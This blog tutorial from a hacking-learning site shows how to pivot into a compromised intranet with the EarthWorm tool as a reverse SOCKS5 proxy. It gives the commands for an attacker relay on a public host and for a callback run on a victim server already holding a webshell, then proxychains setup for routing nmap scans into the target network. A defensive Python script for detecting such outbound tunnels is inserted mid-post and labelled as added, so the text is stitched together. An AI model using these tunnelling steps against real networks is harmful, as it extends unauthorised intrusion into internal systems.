Hacking Book | Free Online Hacking Learning


How to use EW as a SOCKS5 proxy for intranet penetration

Posted by harmelink at 2020-03-14

0x00 Preface

Recently, while working on a site, I needed to do some intranet penetration, and a more experienced friend recommended EW to me. This article simulates an attack scenario to give a brief introduction to using earthworm. The official EW site already documents all of this in great detail; this is purely a personal note covering the following points:

1. How to use EW as a reverse SOCKS5 proxy

2. How to configure a browser to use the SOCKS5 proxy to reach the target intranet's web services

3. How to use proxychains to give the terminal a SOCKS5 proxy (convenient for pushing the traffic of local command-line tools into the target intranet)

0x01 basic environment and network topology

Kali Linux (attacker, internal network)

Ubuntu 16.04.3 (attacker, public network, http://120.xxxx.xxx.xxx)

Windows Server 2008 (victim, target intranet, http://10.xxxx.xxx.xxx)

Network topology: Kali Linux is a local virtual machine, Ubuntu is an ECS instance on the public network, and Windows Server 2008 is the target machine, which has an internal IP with some ports mapped to the external network.

There should be a topology diagram here; I'll learn Visio later and add one. 23333

0x02 scene simulation

Suppose we have already obtained control of one machine in the target intranet (the machine maps port 80 to the Internet, its web service has a vulnerability, and we have obtained a webshell). I need to penetrate further into the intranet. Right now I have a public Ubuntu host and an intranet Kali host. How can I use a reverse SOCKS5 proxy to route Kali's traffic into the target intranet?

0x03 use EW as reverse Socks5 proxy

Here I only demonstrate how to use EW as a reverse SOCKS5 proxy. For forward and multi-level cascading proxies, please refer to the official documentation.

Step 1: execute the following command on the public-network Ubuntu host:

./ew_for_linux64 -s rcsocks -l 1080 -e 1024 &

This command makes the public host listen on ports 1080 and 1024: port 1080 waits for the attacker machine to connect, and port 1024 waits for the target machine to connect back.

Step 2: execute the following command on the target machine:

ew_for_Win.exe -s rssocks -d 120.xxx.xxx.xx -e 1024

The value of the -d parameter is the public IP address of the Ubuntu host from step 1.

Step 3: the attacker machine accesses the target intranet's services through proxychains or through a browser configured with the SOCKS5 proxy.
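From the defender's side, the tell-tale sign of step 2 is an internal server that normally only receives connections opening a long-lived outbound TCP session to a public IP on an unusual port (the rssocks side dialling back to rcsocks). The following Python script is an added example, not code from the original post or from the EW project: it scans constructed connection-log records for that pattern. The RFC 1918 check, the egress allowlist, the log format and all addresses (documentation ranges standing in for public IPs) are assumptions made for the example.

```python
import ipaddress
from collections import defaultdict

# RFC 1918 ranges decide what counts as "internal". Documentation-range addresses
# (198.51.100.x, 203.0.113.x) stand in for public IPs in the constructed sample.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Hypothetical egress allowlist: (public IP, port) pairs the web server may legitimately reach.
EGRESS_ALLOWLIST = {("203.0.113.10", 443)}

# Constructed connection log: timestamp src sport dst dport proto duration_seconds
SAMPLE_LOG = """\
2020-03-14T10:01:00 10.0.0.5 52311 198.51.100.7 1024 tcp 3605
2020-03-14T10:01:02 10.0.0.5 52312 203.0.113.10 443 tcp 3
2020-03-14T10:03:10 10.0.0.9 49100 198.51.100.7 1024 tcp 2
2020-03-14T10:05:00 10.0.0.5 52313 198.51.100.7 1024 tcp 3300
"""

def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)

def parse_line(line):
    ts, src, sport, dst, dport, proto, dur = line.split()
    return {"ts": ts, "src": src, "dst": dst, "dport": int(dport),
            "proto": proto, "dur": int(dur)}

def find_reverse_tunnel_candidates(log_text, min_duration=600):
    """Return sorted (src, dst, dport, total_seconds) tuples for internal hosts that
    hold long-lived outbound TCP sessions to public endpoints not on the allowlist."""
    totals = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec["proto"] != "tcp" or not is_internal(rec["src"]) or is_internal(rec["dst"]):
            continue                      # only internal -> public TCP flows matter here
        if (rec["dst"], rec["dport"]) in EGRESS_ALLOWLIST:
            continue                      # known-good egress, skip
        if rec["dur"] >= min_duration:    # a reverse SOCKS control channel stays open for hours
            totals[(rec["src"], rec["dst"], rec["dport"])] += rec["dur"]
    return sorted(key + (secs,) for key, secs in totals.items())

if __name__ == "__main__":
    for src, dst, dport, secs in find_reverse_tunnel_candidates(SAMPLE_LOG):
        print(f"possible reverse tunnel: {src} -> {dst}:{dport} ({secs}s of outbound sessions)")
```

In a real deployment the same logic runs over firewall or NetFlow exports, and the allowlist is the server's documented egress baseline.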

0x04 setting a SOCKS5 proxy in the browser

In the browser's proxy settings, configure a SOCKS5 proxy pointing at the public host's port 1080 and click OK. You can now reach the target intranet's web services through the browser.

0x05 using proxychains to set a SOCKS5 proxy for the terminal

Step 1: download and install proxychains

cd /usr/local/src
git clone https://github.com/rofl0r/proxychains-ng.git
cd proxychains-ng
./configure --prefix=/usr --sysconfdir=/etc
make && make install
make install-config
cd .. && rm -rf proxychains-ng

Step 2: edit the proxychains configuration file to set the proxy

vi /etc/proxychains.conf

Add the following line at the end of the file (the [ProxyList] section):

socks5 120.xx.xx.xx 1080

Step 3: for example, scan the target intranet with proxychains nmap

Once configured, you can prefix a command with proxychains, for example proxychains nmap, to push nmap's traffic through the proxy into the target intranet for scanning. Other command-line tools work the same way.

0x06 postscript

While using it I also ran into some problems: some tools do not go through the SOCKS5 proxy, which is rather awkward, and the specific reason is unknown. I'm a little sleepy; I'll go home and sleep and sort out the rest tomorrow. Health is the capital of revolution.

I hope that readers interested in this area can get something out of this article. Of course, if there are any mistakes, please don't hesitate to point them out in the comments.
